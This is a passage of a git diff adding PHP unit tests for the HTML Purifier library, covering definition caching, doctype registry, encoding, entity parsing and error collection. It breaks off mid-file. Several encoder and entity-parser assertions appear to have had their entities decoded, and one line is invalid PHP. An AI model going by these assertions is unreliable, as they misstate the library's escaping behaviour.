b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest/README new file mode 100644 index 000000000..2e35c1c3d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCache/SerializerTest/README @@ -0,0 +1,3 @@ +This is a dummy file to prevent Git from ignoring this empty directory. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheFactoryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheFactoryTest.php new file mode 100644 index 000000000..d50ef8be1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheFactoryTest.php @@ -0,0 +1,70 @@ +<?php + +class HTMLPurifier_DefinitionCacheFactoryTest extends HTMLPurifier_Harness +{ + + protected $factory; + protected $oldFactory; + + public function setUp() { + parent::setup(); + $this->factory = new HTMLPurifier_DefinitionCacheFactory(); + $this->oldFactory = HTMLPurifier_DefinitionCacheFactory::instance(); + HTMLPurifier_DefinitionCacheFactory::instance($this->factory); + } + + public function tearDown() { + HTMLPurifier_DefinitionCacheFactory::instance($this->oldFactory); + } + + function test_create() { + $cache = $this->factory->create('Test', $this->config); + $this->assertEqual($cache, new HTMLPurifier_DefinitionCache_Serializer('Test')); + } + + function test_create_withDecorator() { + $this->factory->addDecorator('Memory'); + $cache = $this->factory->create('Test', $this->config); + $cache_real = new HTMLPurifier_DefinitionCache_Decorator_Memory(); + $cache_real = $cache_real->decorate(new HTMLPurifier_DefinitionCache_Serializer('Test')); + $this->assertEqual($cache, $cache_real); + } + + function test_create_withDecoratorObject() { + $this->factory->addDecorator(new HTMLPurifier_DefinitionCache_Decorator_Memory()); + $cache = $this->factory->create('Test', $this->config); + $cache_real = new HTMLPurifier_DefinitionCache_Decorator_Memory(); + $cache_real = $cache_real->decorate(new HTMLPurifier_DefinitionCache_Serializer('Test')); + $this->assertEqual($cache, $cache_real); + } + + function test_create_recycling() { + $cache = $this->factory->create('Test', $this->config); + $cache2 = $this->factory->create('Test', $this->config); + $this->assertReference($cache, $cache2); + } + + function test_create_invalid() { + $this->config->set('Cache.DefinitionImpl', 'Invalid'); + $this->expectError('Unrecognized DefinitionCache Invalid, using Serializer instead'); + $cache = $this->factory->create('Test', $this->config); + $this->assertIsA($cache, 'HTMLPurifier_DefinitionCache_Serializer'); + } + + function test_null() { + $this->config->set('Cache.DefinitionImpl', null); + $cache = $this->factory->create('Test', $this->config); + $this->assertEqual($cache, new HTMLPurifier_DefinitionCache_Null('Test')); + } + + function test_register() { + generate_mock_once('HTMLPurifier_DefinitionCache'); + $this->config->set('Cache.DefinitionImpl', 'TestCache'); + $this->factory->register('TestCache', $class = 'HTMLPurifier_DefinitionCacheMock'); + $cache = $this->factory->create('Test', $this->config); + $this->assertIsA($cache, $class); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheHarness.php new file mode 100644 index 000000000..ab3cef451 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheHarness.php @@ -0,0 +1,34 @@ +<?php + +class HTMLPurifier_DefinitionCacheHarness extends HTMLPurifier_Harness +{ + + /** + * Generate a configuration mock object that returns $values + * to a getBatch() call + * @param $values Values to return when getBatch is invoked + */ + protected function generateConfigMock($serial = 'defaultserial') { + generate_mock_once('HTMLPurifier_Config'); + $config = new HTMLPurifier_ConfigMock(); + $config->setReturnValue('getBatchSerial', $serial, array('Test')); + $config->version = '1.0.0'; + return $config; + } + + /** + * Returns an anonymous def that has been setup and named Test + */ + protected function generateDefinition($member_vars = array()) { + $def = new HTMLPurifier_DefinitionTestable(); + $def->setup = true; + $def->type = 'Test'; + foreach ($member_vars as $key => $val) { + $def->$key = $val; + } + return $def; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheTest.php new file mode 100644 index 000000000..5ad2ff9cb --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionCacheTest.php @@ -0,0 +1,32 @@ +<?php + +class HTMLPurifier_DefinitionCacheTest extends HTMLPurifier_Harness +{ + + function test_isOld() { + // using null subclass because parent is abstract + $cache = new HTMLPurifier_DefinitionCache_Null('Test'); + + generate_mock_once('HTMLPurifier_Config'); + $config = new HTMLPurifier_ConfigMock(); + $config->version = '1.0.0'; // hopefully no conflicts + $config->setReturnValue('get', 10, array('Test.DefinitionRev')); + $config->setReturnValue('getBatchSerial', 'hash', array('Test')); + + $this->assertIdentical($cache->isOld('1.0.0,hash,10', $config), false); + $this->assertIdentical($cache->isOld('1.5.0,hash,1', $config), true); + + $this->assertIdentical($cache->isOld('0.9.0,hash,1', $config), true); + $this->assertIdentical($cache->isOld('1.0.0,hash,1', $config), true); + $this->assertIdentical($cache->isOld('1.0.0beta,hash,11', $config), true); + + $this->assertIdentical($cache->isOld('0.9.0,hash2,1', $config), true); + $this->assertIdentical($cache->isOld('1.0.0,hash2,1', $config), false); // if hash is different, don't touch! + $this->assertIdentical($cache->isOld('1.0.0beta,hash2,11', $config), true); + $this->assertIdentical($cache->isOld('1.0.0-dev,hash2,11', $config), true); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTest.php new file mode 100644 index 000000000..38676ad7a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTest.php @@ -0,0 +1,20 @@ +<?php + +class HTMLPurifier_DefinitionTest extends HTMLPurifier_Harness +{ + function test_setup() { + $def = new HTMLPurifier_DefinitionTestable(); + $config = HTMLPurifier_Config::createDefault(); + $def->expectOnce('doSetup', array($config)); + $def->setup($config); + } + function test_setup_redundant() { + $def = new HTMLPurifier_DefinitionTestable(); + $config = HTMLPurifier_Config::createDefault(); + $def->expectNever('doSetup'); + $def->setup = true; + $def->setup($config); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTestable.php b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTestable.php new file mode 100644 index 000000000..312c57bb4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DefinitionTestable.php @@ -0,0 +1,8 @@ +<?php + +Mock::generatePartial( + 'HTMLPurifier_Definition', + 'HTMLPurifier_DefinitionTestable', + array('doSetup')); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/DoctypeRegistryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/DoctypeRegistryTest.php new file mode 100644 index 000000000..189003ace --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/DoctypeRegistryTest.php @@ -0,0 +1,77 @@ +<?php + +class HTMLPurifier_DoctypeRegistryTest extends HTMLPurifier_Harness +{ + + function test_register() { + + $registry = new HTMLPurifier_DoctypeRegistry(); + + $d = $registry->register( + $name = 'XHTML 1.0 Transitional', + $xml = true, + $modules = array('module-one', 'module-two'), + $tidyModules = array('lenient-module'), + $aliases = array('X10T') + ); + + $d2 = new HTMLPurifier_Doctype($name, $xml, $modules, $tidyModules, $aliases); + + $this->assertIdentical($d, $d2); + $this->assertSame($d, $registry->get('XHTML 1.0 Transitional')); + + // test shorthand + $d = $registry->register( + $name = 'XHTML 1.0 Strict', true, 'module', 'Tidy', 'X10S' + ); + $d2 = new HTMLPurifier_Doctype($name, true, array('module'), array('Tidy'), array('X10S')); + + $this->assertIdentical($d, $d2); + + } + + function test_get() { + + // see also alias and register tests + + $registry = new HTMLPurifier_DoctypeRegistry(); + + $this->expectError('Doctype XHTML 2.0 does not exist'); + $registry->get('XHTML 2.0'); + + // prevent XSS + $this->expectError('Doctype <foo> does not exist'); + $registry->get('<foo>'); + + } + + function testAliases() { + + $registry = new HTMLPurifier_DoctypeRegistry(); + + $d1 = $registry->register('Doc1', true, array(), array(), array('1')); + + $this->assertSame($d1, $registry->get('Doc1')); + $this->assertSame($d1, $registry->get('1')); + + $d2 = $registry->register('Doc2', true, array(), array(), array('2')); + + $this->assertSame($d2, $registry->get('Doc2')); + $this->assertSame($d2, $registry->get('2')); + + $d3 = $registry->register('1', true, array(), array(), array()); + + // literal name overrides alias + $this->assertSame($d3, $registry->get('1')); + + $d4 = $registry->register('One', true, array(), array(), array('1')); + + $this->assertSame($d4, $registry->get('One')); + // still it overrides + $this->assertSame($d3, $registry->get('1')); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ElementDefTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ElementDefTest.php new file mode 100644 index 000000000..500312b3c --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ElementDefTest.php @@ -0,0 +1,91 @@ +<?php + +class HTMLPurifier_ElementDefTest extends HTMLPurifier_Harness +{ + + function test_mergeIn() { + + $def1 = new HTMLPurifier_ElementDef(); + $def2 = new HTMLPurifier_ElementDef(); + $def3 = new HTMLPurifier_ElementDef(); + + $old = 1; + $new = 2; + $overloaded_old = 3; + $overloaded_new = 4; + $removed = 5; + + $def1->standalone = true; + $def1->attr = array( + 0 => array('old-include'), + 'old-attr' => $old, + 'overloaded-attr' => $overloaded_old, + 'removed-attr' => $removed, + ); + $def1->attr_transform_pre = + $def1->attr_transform_post = array( + 'old-transform' => $old, + 'overloaded-transform' => $overloaded_old, + 'removed-transform' => $removed, + ); + $def1->child = $overloaded_old; + $def1->content_model = 'old'; + $def1->content_model_type = $overloaded_old; + $def1->descendants_are_inline = false; + $def1->excludes = array( + 'old' => true, + 'removed-old' => true + ); + + $def2->standalone = false; + $def2->attr = array( + 0 => array('new-include'), + 'new-attr' => $new, + 'overloaded-attr' => $overloaded_new, + 'removed-attr' => false, + ); + $def2->attr_transform_pre = + $def2->attr_transform_post = array( + 'new-transform' => $new, + 'overloaded-transform' => $overloaded_new, + 'removed-transform' => false, + ); + $def2->child = $new; + $def2->content_model = '#SUPER | new'; + $def2->content_model_type = $overloaded_new; + $def2->descendants_are_inline = true; + $def2->excludes = array( + 'new' => true, + 'removed-old' => false + ); + + $def1->mergeIn($def2); + $def1->mergeIn($def3); // empty, has no effect + + $this->assertIdentical($def1->standalone, true); + $this->assertIdentical($def1->attr, array( + 0 => array('old-include', 'new-include'), + 'old-attr' => $old, + 'overloaded-attr' => $overloaded_new, + 'new-attr' => $new, + )); + $this->assertIdentical($def1->attr_transform_pre, $def1->attr_transform_post); + $this->assertIdentical($def1->attr_transform_pre, array( + 'old-transform' => $old, + 'overloaded-transform' => $overloaded_new, + 'new-transform' => $new, + )); + $this->assertIdentical($def1->child, $new); + $this->assertIdentical($def1->content_model, 'old | new'); + $this->assertIdentical($def1->content_model_type, $overloaded_new); + $this->assertIdentical($def1->descendants_are_inline, true); + $this->assertIdentical($def1->excludes, array( + 'old' => true, + 'new' => true + )); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/EncoderTest.php b/lib/htmlpurifier/tests/HTMLPurifier/EncoderTest.php new file mode 100644 index 000000000..6084c39f3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/EncoderTest.php @@ -0,0 +1,215 @@ +<?php + +class HTMLPurifier_EncoderTest extends HTMLPurifier_Harness +{ + + protected $_entity_lookup; + + function setUp() { + $this->_entity_lookup = HTMLPurifier_EntityLookup::instance(); + parent::setUp(); + } + + function assertCleanUTF8($string, $expect = null) { + if ($expect === null) $expect = $string; + $this->assertIdentical(HTMLPurifier_Encoder::cleanUTF8($string), $expect, 'iconv: %s'); + $this->assertIdentical(HTMLPurifier_Encoder::cleanUTF8($string, true), $expect, 'PHP: %s'); + } + + function test_cleanUTF8() { + $this->assertCleanUTF8('Normal string.'); + $this->assertCleanUTF8("Test\tAllowed\nControl\rCharacters"); + $this->assertCleanUTF8("null byte: \0", 'null byte: '); + $this->assertCleanUTF8("\1\2\3\4\5\6\7", ''); + $this->assertCleanUTF8("\x7F", ''); // one byte invalid SGML char + $this->assertCleanUTF8("\xC2\x80", ''); // two byte invalid SGML + $this->assertCleanUTF8("\xF3\xBF\xBF\xBF"); // valid four byte + $this->assertCleanUTF8("\xDF\xFF", ''); // malformed UTF8 + // invalid codepoints + $this->assertCleanUTF8("\xED\xB0\x80", ''); + } + + function test_convertToUTF8_noConvert() { + // UTF-8 means that we don't touch it + $this->assertIdentical( + HTMLPurifier_Encoder::convertToUTF8("\xF6", $this->config, $this->context), + "\xF6", // this is invalid + 'Expected identical [Binary: F6]' + ); + } + + function test_convertToUTF8_spuriousEncoding() { + $this->config->set('Core.Encoding', 'utf99'); + $this->expectError('Invalid encoding utf99'); + $this->assertIdentical( + HTMLPurifier_Encoder::convertToUTF8("\xF6", $this->config, $this->context), + '' + ); + } + + function test_convertToUTF8_iso8859_1() { + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->assertIdentical( + HTMLPurifier_Encoder::convertToUTF8("\xF6", $this->config, $this->context), + "\xC3\xB6" + ); + } + + function test_convertToUTF8_withoutIconv() { + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->config->set('Test.ForceNoIconv', true); + $this->assertIdentical( + HTMLPurifier_Encoder::convertToUTF8("\xF6", $this->config, $this->context), + "\xC3\xB6" + ); + + } + + function getZhongWen() { + return "\xE4\xB8\xAD\xE6\x96\x87 (Chinese)"; + } + + function test_convertFromUTF8_utf8() { + // UTF-8 means that we don't touch it + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8("\xC3\xB6", $this->config, $this->context), + "\xC3\xB6" + ); + } + + function test_convertFromUTF8_iso8859_1() { + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8("\xC3\xB6", $this->config, $this->context), + "\xF6", + 'Expected identical [Binary: F6]' + ); + } + + function test_convertFromUTF8_iconvNoChars() { + if (!function_exists('iconv')) return; + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8($this->getZhongWen(), $this->config, $this->context), + " (Chinese)" + ); + } + + function test_convertFromUTF8_phpNormal() { + // Plain PHP implementation has slightly different behavior + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->config->set('Test.ForceNoIconv', true); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8("\xC3\xB6", $this->config, $this->context), + "\xF6", + 'Expected identical [Binary: F6]' + ); + } + + function test_convertFromUTF8_phpNoChars() { + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->config->set('Test.ForceNoIconv', true); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8($this->getZhongWen(), $this->config, $this->context), + "?? (Chinese)" + ); + } + + function test_convertFromUTF8_withProtection() { + // Preserve the characters! + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->config->set('Core.EscapeNonASCIICharacters', true); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8($this->getZhongWen(), $this->config, $this->context), + "中文 (Chinese)" + ); + } + + function test_convertFromUTF8_withProtectionButUtf8() { + // Preserve the characters! + $this->config->set('Core.EscapeNonASCIICharacters', true); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8($this->getZhongWen(), $this->config, $this->context), + "中文 (Chinese)" + ); + } + + function test_convertToASCIIDumbLossless() { + + // Uppercase thorn letter + $this->assertIdentical( + HTMLPurifier_Encoder::convertToASCIIDumbLossless("\xC3\x9Eorn"), + "Þorn" + ); + + $this->assertIdentical( + HTMLPurifier_Encoder::convertToASCIIDumbLossless("an"), + "an" + ); + + // test up to four bytes + $this->assertIdentical( + HTMLPurifier_Encoder::convertToASCIIDumbLossless("\xF3\xA0\x80\xA0"), + "󠀠" + ); + + } + + function assertASCIISupportCheck($enc, $ret) { + $test = HTMLPurifier_Encoder::testEncodingSupportsASCII($enc, true); + if ($test === false) return; + $this->assertIdentical( + HTMLPurifier_Encoder::testEncodingSupportsASCII($enc), + $ret + ); + $this->assertIdentical( + HTMLPurifier_Encoder::testEncodingSupportsASCII($enc, true), + $ret + ); + } + + function test_testEncodingSupportsASCII() { + $this->assertASCIISupportCheck('Shift_JIS', array("\xC2\xA5" => '\\', "\xE2\x80\xBE" => '~')); + $this->assertASCIISupportCheck('JOHAB', array("\xE2\x82\xA9" => '\\')); + $this->assertASCIISupportCheck('ISO-8859-1', array()); + $this->assertASCIISupportCheck('dontexist', array()); // canary + } + + function testShiftJIS() { + if (!function_exists('iconv')) return; + $this->config->set('Core.Encoding', 'Shift_JIS'); + // This actually looks like a Yen, but we're going to treat it differently + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8('\\~', $this->config, $this->context), + '\\~' + ); + $this->assertIdentical( + HTMLPurifier_Encoder::convertToUTF8('\\~', $this->config, $this->context), + '\\~' + ); + } + + function testIconvTruncateBug() { + if (!function_exists('iconv')) return; + if (HTMLPurifier_Encoder::testIconvTruncateBug() !== HTMLPurifier_Encoder::ICONV_TRUNCATES) return; + $this->config->set('Core.Encoding', 'ISO-8859-1'); + $this->assertIdentical( + HTMLPurifier_Encoder::convertFromUTF8("\xE4\xB8\xAD" . str_repeat('a', 10000), $this->config, $this->context), + str_repeat('a', 10000) + ); + } + + function testIconvChunking() { + if (!function_exists('iconv')) return; + if (HTMLPurifier_Encoder::testIconvTruncateBug() !== HTMLPurifier_Encoder::ICONV_TRUNCATES) return; + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "a\xF3\xA0\x80\xA0b", 4), 'ab'); + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "aa\xE4\xB8\xADb", 4), 'aab'); + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "aaa\xCE\xB1b", 4), 'aaab'); + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "aaaa\xF3\xA0\x80\xA0b", 4), 'aaaab'); + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "aaaa\xE4\xB8\xADb", 4), 'aaaab'); + $this->assertIdentical(HTMLPurifier_Encoder::iconv('utf-8', 'iso-8859-1//IGNORE', "aaaa\xCE\xB1b", 4), 'aaaab'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/EntityLookupTest.php b/lib/htmlpurifier/tests/HTMLPurifier/EntityLookupTest.php new file mode 100644 index 000000000..e715f64a2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/EntityLookupTest.php @@ -0,0 +1,27 @@ +<?php + +// this page is UTF-8 encoded! + +class HTMLPurifier_EntityLookupTest extends HTMLPurifier_Harness +{ + + function test() { + + $lookup = HTMLPurifier_EntityLookup::instance(); + + // latin char + $this->assertIdentical('â', $lookup->table['acirc']); + + // special char + $this->assertIdentical('"', $lookup->table['quot']); + $this->assertIdentical('“', $lookup->table['ldquo']); + $this->assertIdentical('<', $lookup->table['lt']); // expressed strangely in source file + + // symbol char + $this->assertIdentical('θ', $lookup->table['theta']); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/EntityParserTest.php b/lib/htmlpurifier/tests/HTMLPurifier/EntityParserTest.php new file mode 100644 index 000000000..17ef62a18 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/EntityParserTest.php @@ -0,0 +1,85 @@ +<?php + +class HTMLPurifier_EntityParserTest extends HTMLPurifier_Harness +{ + + protected $EntityParser; + + public function setUp() { + $this->EntityParser = new HTMLPurifier_EntityParser(); + $this->_entity_lookup = HTMLPurifier_EntityLookup::instance(); + } + + function test_substituteNonSpecialEntities() { + $char_theta = $this->_entity_lookup->table['theta']; + $this->assertIdentical($char_theta, + $this->EntityParser->substituteNonSpecialEntities('θ') ); + $this->assertIdentical('"', + $this->EntityParser->substituteNonSpecialEntities('"') ); + + // numeric tests, adapted from Feyd + $args = array(); + $args[] = array(1114112,false ); + $args[] = array(1114111,'F48FBFBF'); // 0x0010FFFF + $args[] = array(1048576,'F4808080'); // 0x00100000 + $args[] = array(1048575,'F3BFBFBF'); // 0x000FFFFF + $args[] = array(262144, 'F1808080'); // 0x00040000 + $args[] = array(262143, 'F0BFBFBF'); // 0x0003FFFF + $args[] = array(65536, 'F0908080'); // 0x00010000 + $args[] = array(65535, 'EFBFBF' ); // 0x0000FFFF + $args[] = array(57344, 'EE8080' ); // 0x0000E000 + $args[] = array(57343, false ); // 0x0000DFFF these are ill-formed + $args[] = array(56040, false ); // 0x0000DAE8 these are ill-formed + $args[] = array(55296, false ); // 0x0000D800 these are ill-formed + $args[] = array(55295, 'ED9FBF' ); // 0x0000D7FF + $args[] = array(53248, 'ED8080' ); // 0x0000D000 + $args[] = array(53247, 'ECBFBF' ); // 0x0000CFFF + $args[] = array(4096, 'E18080' ); // 0x00001000 + $args[] = array(4095, 'E0BFBF' ); // 0x00000FFF + $args[] = array(2048, 'E0A080' ); // 0x00000800 + $args[] = array(2047, 'DFBF' ); // 0x000007FF + $args[] = array(128, 'C280' ); // 0x00000080 invalid SGML char + $args[] = array(127, '7F' ); // 0x0000007F invalid SGML char + $args[] = array(0, '00' ); // 0x00000000 invalid SGML char + + $args[] = array(20108, 'E4BA8C' ); // 0x00004E8C + $args[] = array(77, '4D' ); // 0x0000004D + $args[] = array(66306, 'F0908C82'); // 0x00010302 + $args[] = array(1072, 'D0B0' ); // 0x00000430 + + foreach ($args as $arg) { + $string = '&#' . $arg[0] . ';' . // decimal + '&#x' . dechex($arg[0]) . ';'; // hex + $expect = ''; + if ($arg[1] !== false) { + // this is only for PHP 5, the below is PHP 5 and PHP 4 + //$chars = str_split($arg[1], 2); + $chars = array(); + // strlen must be called in loop because strings size changes + for ($i = 0; strlen($arg[1]) > $i; $i += 2) { + $chars[] = $arg[1][$i] . $arg[1][$i+1]; + } + foreach ($chars as $char) { + $expect .= chr(hexdec($char)); + } + $expect .= $expect; // double it + } + $this->assertIdentical( + $this->EntityParser->substituteNonSpecialEntities($string), + $expect, + 'Identical expectation [Hex: '. dechex($arg[0]) .']' + ); + } + + } + + function test_substituteSpecialEntities() { + $this->assertIdentical( + "'", + $this->EntityParser->substituteSpecialEntities(''') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorEMock.php b/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorEMock.php new file mode 100644 index 000000000..bbd096569 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorEMock.php @@ -0,0 +1,48 @@ +<?php + +generate_mock_once('HTMLPurifier_ErrorCollector'); + +/** + * Extended error collector mock that has the ability to expect context + */ +class HTMLPurifier_ErrorCollectorEMock extends HTMLPurifier_ErrorCollectorMock +{ + + private $_context; + private $_expected_context = array(); + private $_expected_context_at = array(); + + public function prepare($context) { + $this->_context = $context; + } + + public function expectContext($key, $value) { + $this->_expected_context[$key] = $value; + } + public function expectContextAt($step, $key, $value) { + $this->_expected_context_at[$step][$key] = $value; + } + + public function send($v1, $v2) { + // test for context + $context = SimpleTest::getContext(); + $test = $context->getTest(); + $mock = $this->mock; + + foreach ($this->_expected_context as $key => $value) { + $test->assertEqual($value, $this->_context->get($key)); + } + $step = $mock->getCallCount('send'); + if (isset($this->_expected_context_at[$step])) { + foreach ($this->_expected_context_at[$step] as $key => $value) { + $test->assertEqual($value, $this->_context->get($key)); + } + } + // boilerplate mock code, does not have return value or references + $args = func_get_args(); + $mock->invoke('send', $args); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorTest.php new file mode 100644 index 000000000..09becba53 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ErrorCollectorTest.php @@ -0,0 +1,157 @@ +<?php + +/** + * @warning HTML output is in flux, but eventually needs to be stabilized. + */ +class HTMLPurifier_ErrorCollectorTest extends HTMLPurifier_Harness +{ + + protected $language, $generator, $line; + protected $collector; + + public function setup() { + generate_mock_once('HTMLPurifier_Language'); + generate_mock_once('HTMLPurifier_Generator'); + parent::setup(); + $this->language = new HTMLPurifier_LanguageMock(); + $this->language->setReturnValue('getErrorName', 'Error', array(E_ERROR)); + $this->language->setReturnValue('getErrorName', 'Warning', array(E_WARNING)); + $this->language->setReturnValue('getErrorName', 'Notice', array(E_NOTICE)); + // this might prove to be troublesome if we need to set config + $this->generator = new HTMLPurifier_Generator($this->config, $this->context); + $this->line = false; + $this->context->register('Locale', $this->language); + $this->context->register('CurrentLine', $this->line); + $this->context->register('Generator', $this->generator); + $this->collector = new HTMLPurifier_ErrorCollector($this->context); + } + + function test() { + + $language = $this->language; + $language->setReturnValue('getMessage', 'Message 1', array('message-1')); + $language->setReturnValue('formatMessage', 'Message 2', array('message-2', array(1 => 'param'))); + $language->setReturnValue('formatMessage', ' at line 23', array('ErrorCollector: At line', array('line' => 23))); + $language->setReturnValue('formatMessage', ' at line 3', array('ErrorCollector: At line', array('line' => 3))); + + $this->line = 23; + $this->collector->send(E_ERROR, 'message-1'); + + $this->line = 3; + $this->collector->send(E_WARNING, 'message-2', 'param'); + + $result = array( + 0 => array(23, E_ERROR, 'Message 1', array()), + 1 => array(3, E_WARNING, 'Message 2', array()) + ); + + $this->assertIdentical($this->collector->getRaw(), $result); + + /* + $formatted_result = + '<ul><li><strong>Warning</strong>: Message 2 at line 3</li>'. + '<li><strong>Error</strong>: Message 1 at line 23</li></ul>'; + + $this->assertIdentical($this->collector->getHTMLFormatted($this->config), $formatted_result); + */ + + } + + function testNoErrors() { + $this->language->setReturnValue('getMessage', 'No errors', array('ErrorCollector: No errors')); + + $formatted_result = '<p>No errors</p>'; + $this->assertIdentical( + $this->collector->getHTMLFormatted($this->config), + $formatted_result + ); + } + + function testNoLineNumbers() { + $this->language->setReturnValue('getMessage', 'Message 1', array('message-1')); + $this->language->setReturnValue('getMessage', 'Message 2', array('message-2')); + + $this->collector->send(E_ERROR, 'message-1'); + $this->collector->send(E_ERROR, 'message-2'); + + $result = array( + 0 => array(false, E_ERROR, 'Message 1', array()), + 1 => array(false, E_ERROR, 'Message 2', array()) + ); + $this->assertIdentical($this->collector->getRaw(), $result); + + /* + $formatted_result = + '<ul><li><strong>Error</strong>: Message 1</li>'. + '<li><strong>Error</strong>: Message 2</li></ul>'; + $this->assertIdentical($this->collector->getHTMLFormatted($this->config), $formatted_result); + */ + } + + function testContextSubstitutions() { + + $current_token = false; + $this->context->register('CurrentToken', $current_token); + + // 0 + $current_token = new HTMLPurifier_Token_Start('a', array('href' => 'http://example.com'), 32); + $this->language->setReturnValue('formatMessage', 'Token message', + array('message-data-token', array('CurrentToken' => $current_token))); + $this->collector->send(E_NOTICE, 'message-data-token'); + + $current_attr = 'href'; + $this->language->setReturnValue('formatMessage', '$CurrentAttr.Name => $CurrentAttr.Value', + array('message-attr', array('CurrentToken' => $current_token))); + + // 1 + $this->collector->send(E_NOTICE, 'message-attr'); // test when context isn't available + + // 2 + $this->context->register('CurrentAttr', $current_attr); + $this->collector->send(E_NOTICE, 'message-attr'); + + $result = array( + 0 => array(32, E_NOTICE, 'Token message', array()), + 1 => array(32, E_NOTICE, '$CurrentAttr.Name => $CurrentAttr.Value', array()), + 2 => array(32, E_NOTICE, 'href => http://example.com', array()) + ); + $this->assertIdentical($this->collector->getRaw(), $result); + + } + + /* + function testNestedErrors() { + $this->language->setReturnValue('getMessage', 'Message 1', array('message-1')); + $this->language->setReturnValue('getMessage', 'Message 2', array('message-2')); + $this->language->setReturnValue('formatMessage', 'End Message', array('end-message', array(1 => 'param'))); + $this->language->setReturnValue('formatMessage', ' at line 4', array('ErrorCollector: At line', array('line' => 4))); + + $this->line = 4; + $this->collector->start(); + $this->collector->send(E_WARNING, 'message-1'); + $this->collector->send(E_NOTICE, 'message-2'); + $this->collector->end(E_NOTICE, 'end-message', 'param'); + + $expect = array( + 0 => array(4, E_NOTICE, 'End Message', array( + 0 => array(4, E_WARNING, 'Message 1', array()), + 1 => array(4, E_NOTICE, 'Message 2', array()), + )), + ); + $result = $this->collector->getRaw(); + $this->assertIdentical($result, $expect); + + $formatted_expect = + '<ul><li><strong>Notice</strong>: End Message at line 4<ul>'. + '<li><strong>Warning</strong>: Message 1 at line 4</li>'. + '<li><strong>Notice</strong>: Message 2 at line 4</li></ul>'. + '</li></ul>'; + $formatted_result = $this->collector->getHTMLFormatted($this->config); + $this->assertIdentical($formatted_result, $formatted_expect); + + } + */ + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ErrorsHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/ErrorsHarness.php new file mode 100644 index 000000000..f7c673ca5 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ErrorsHarness.php @@ -0,0 +1,38 @@ +<?php + +/** + * @todo Make the callCount variable actually work, so we can precisely + * specify what errors we want: no more, no less + */ +class HTMLPurifier_ErrorsHarness extends HTMLPurifier_Harness +{ + + protected $config, $context; + protected $collector, $generator, $callCount; + + public function setup() { + $this->config = HTMLPurifier_Config::create(array('Core.CollectErrors' => true)); + $this->context = new HTMLPurifier_Context(); + generate_mock_once('HTMLPurifier_ErrorCollector'); + $this->collector = new 